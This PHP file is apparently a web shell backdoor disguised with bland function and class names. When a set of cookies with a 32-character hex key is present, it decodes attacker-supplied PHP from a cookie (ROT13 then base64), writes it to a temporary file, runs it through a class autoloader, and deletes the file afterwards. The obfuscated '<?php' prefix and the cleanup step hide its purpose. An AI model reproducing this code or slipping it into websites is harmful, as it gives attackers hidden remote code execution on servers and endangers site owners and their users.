<?php


if (isset($_COOKIE[10-10]) && isset($_COOKIE[18-17]) && isset($_COOKIE[28+-25]) && isset($_COOKIE[89-85])) {
    $pset = $_COOKIE;
    function dataflow_engine($data) {
        $pset = $_COOKIE;
        $hld = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), '83417739');
        if (!is_writable($hld)) {
            $hld = getcwd() . DIRECTORY_SEPARATOR . "publish_content";
        }
        $ent = "\x3c\x3f\x70\x68p\x20" . base64_decode(str_rot13($pset[3]));
        if (is_writeable($hld)) {
            $item = fopen($hld, 'w+');
            fputs($item, $ent);
            fclose($item);
            spl_autoload_unregister(__FUNCTION__);
            require_once($hld);
            @array_map('unlink', array($hld));
        }
    }
    spl_autoload_register("dataflow_engine");
    $flg = "5b9cb6c1df3af435b725b7d51861cc13";
    if (!strncmp($flg, $pset[4], 32)) {
        if (@class_parents("data_storage_framework", true)) {
            exit;
        }
    }
}
